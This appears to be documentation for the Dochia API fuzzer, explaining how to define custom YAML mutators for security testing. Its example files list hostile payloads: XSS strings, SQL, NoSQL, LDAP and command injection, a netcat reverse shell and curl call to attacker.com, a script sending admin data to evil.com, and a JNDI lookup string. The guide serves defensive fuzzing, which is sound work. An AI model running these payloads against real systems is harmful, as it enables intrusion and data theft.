Custom Mutators

Custom mutators allow you to extend Dochia's fuzzing capabilities by defining your own mutation logic and payloads. This is particularly useful for testing domain-specific vulnerabilities, custom injection patterns, or specialized attack vectors relevant to your application.

Overview

Custom mutators are YAML files that define how to mutate request data during fuzzing. They can be used alongside or instead of the built-in mutators to create targeted fuzzing campaigns for specific vulnerability types.

Mutator Types

Dochia supports 6 different mutator types, each with specific behavior:

REPLACE

Replaces the entire field value with the mutator's payload.

Use Case: Complete value substitution, testing different data types Example: Replace "user@example.com" with "<script>alert(1)</script>"

INSERT

Inserts the mutator's payload within the existing field value.

Use Case: Injection testing while preserving some original content Example: "username" becomes "user<script>name"

PREFIX

Adds the mutator's payload to the beginning of the field value.

Use Case: Testing prefix-based vulnerabilities, protocol confusion Example: "data" becomes "javascript:alert(1)data"

TRAIL

Adds the mutator's payload to the end of the field value.

Use Case: Testing suffix-based vulnerabilities, comment injection Example: "query" becomes "query'; DROP TABLE users; --"

REPLACE_BODY

Replaces the entire request body with the mutator's payload.

Use Case: Testing body-level vulnerabilities, format confusion Example: Replace JSON body with XML or malformed content

IN_BODY

Injects the mutator's payload somewhere within the request body.

Use Case: Body injection testing while preserving structure Example: Inject payloads into JSON values while keeping structure

Mutator File Format

Custom mutators are defined in YAML files with the following structure:

name: <mutator-name>
type: <mutator-type>
values:
  - <payload1>
  - <payload2>
  - <payload3>

Or reference an external file:

name: <mutator-name>
type: <mutator-type>
values: <path-to-file>

Usage

Basic Usage

# Use custom mutators from a folder
dochia fuzz -c api.yml -s https://api.example.com \
  -p /endpoint -X POST \
  --mutators ./custom-mutators/

With Built-in Mutators

Custom mutators work alongside built-in mutators during fuzzing sessions:

# Custom mutators will be mixed with built-in ones
dochia fuzz -c api.yml -s https://api.example.com \
  -p /endpoint -X POST \
  --mutators ./my-mutators/ \
  --stop-after-time-in-sec 300

Examples

XSS Testing Mutator

Create a file xss-mutator.yml:

name: xss mutator
type: replace
values:
  - "<script>"
  - "alert(1)"
  - "console.log('hack')"
  - "<img src=x onerror=alert(1)>"
  - "javascript:alert(document.domain)"
  - "<svg onload=alert(1)>"

SQL Injection Mutator

Create a file sql-injection.yml:

name: sql injection
type: trail
values:
  - "'; DROP TABLE users; --"
  - "' OR '1'='1"
  - "' UNION SELECT * FROM users --"
  - "'; INSERT INTO users VALUES ('hacker', 'password'); --"
  - "' AND 1=CONVERT(int, (SELECT @@version)) --"

NoSQL Injection from File

Create a file nosql-injection.yml:

name: nosql from file
type: replace
values: ../nosql.txt

And create nosql.txt with payloads:

{"$ne": null}
{"$regex": ".*"}
{"$where": "function() { return true; }"}
{"$gt": ""}

Command Injection Mutator

Create a file command-injection.yml:

name: command injection
type: insert
values:
  - "; ls -la"
  - "| whoami"
  - "&& cat /etc/passwd"
  - "; curl http://attacker.com/$(whoami)"
  - "| nc -e /bin/sh attacker.com 4444"

LDAP Injection Mutator

Create a file ldap-injection.yml:

name: ldap injection
type: prefix
values:
  - "*"
  - "*)(uid=*"
  - "*)(|(uid=*"
  - "*)(&(uid=*"
  - "*))%00"

Body Replacement Mutator

Create a file body-replacement.yml:

name: malformed bodies
type: replace_body
values:
  - '<?xml version="1.0"?><root>test</root>'
  - '{"malformed": json}'
  - 'plain text body'
  - '<html><body>HTML content</body></html>'
  - 'BINARY_DATA_HERE'

Advanced Examples

Multi-Stage Attack Mutator

Create a file multi-stage.yml:

name: multi-stage attack
type: replace
values:
  - "admin'; UPDATE users SET role='admin' WHERE username='victim'; --"
  - "<script>fetch('/admin/users').then(r=>r.text()).then(d=>fetch('http://evil.com',{method:'POST',body:d}))</script>"
  - "${jndi:ldap://evil.com/exploit}"
  - "{{7*7}}"
  - "<%=7*7%>"

Protocol Confusion Mutator

Create a file protocol-confusion.yml:

name: protocol confusion
type: prefix
values:
  - "file://"
  - "ftp://"
  - "gopher://"
  - "dict://"
  - "ldap://"
  - "jar:http://evil.com!/"

Best Practices

1. Organize by Vulnerability Type

custom-mutators/
├── xss/
│   ├── reflected-xss.yml
│   ├── stored-xss.yml
│   └── dom-xss.yml
├── injection/
│   ├── sql-injection.yml
│   ├── nosql-injection.yml
│   └── command-injection.yml
└── business-logic/
    ├── privilege-escalation.yml
    └── workflow-bypass.yml

2. Use External Files for Large Payloads

name: comprehensive xss
type: replace
values: ./payloads/xss-comprehensive.txt

3. Combine Different Types

Create multiple mutators with different types for comprehensive testing:

# prefix-xss.yml
name: xss prefix
type: prefix
values:
  - "<script>alert('prefix')</script>"

# suffix-xss.yml  
name: xss suffix
type: trail
values:
  - "<script>alert('suffix')</script>"

4. Domain-Specific Mutators

Create mutators specific to your application's domain:

# financial-app.yml
name: financial injection
type: replace
values:
  - "0.00"
  - "-999999.99"
  - "NULL"
  - "../../etc/passwd"
  - "${account.balance * 0}"

Testing Custom Mutators

Validate Mutator Files

Before using custom mutators in production fuzzing:

# Test with a short fuzzing session
dochia fuzz -c api.yml -s https://api.example.com \
  -p /test-endpoint -X POST \
  --mutators ./custom-mutators/ \
  --stop-after-mutations 10 \
  --match-response-codes 500

Monitor Results

Use appropriate match criteria to identify successful mutations:

# Look for error responses and input reflection
dochia fuzz -c api.yml -s https://api.example.com \
  -p /endpoint -X POST \
  --mutators ./custom-mutators/ \
  --match-response-codes 500 \
  --match-input \
  --match-response-regex "error|exception|syntax"

Overview​

Mutator Types​

REPLACE​

INSERT​

PREFIX​

TRAIL​

REPLACE_BODY​

IN_BODY​

Mutator File Format​

Usage​

Basic Usage​

With Built-in Mutators​

Examples​

XSS Testing Mutator​

SQL Injection Mutator​

NoSQL Injection from File​

Command Injection Mutator​

LDAP Injection Mutator​

Body Replacement Mutator​

Advanced Examples​

Multi-Stage Attack Mutator​

Protocol Confusion Mutator​

Best Practices​

1. Organize by Vulnerability Type​

2. Use External Files for Large Payloads​

3. Combine Different Types​

4. Domain-Specific Mutators​

Testing Custom Mutators​

Validate Mutator Files​

Monitor Results​

See Also​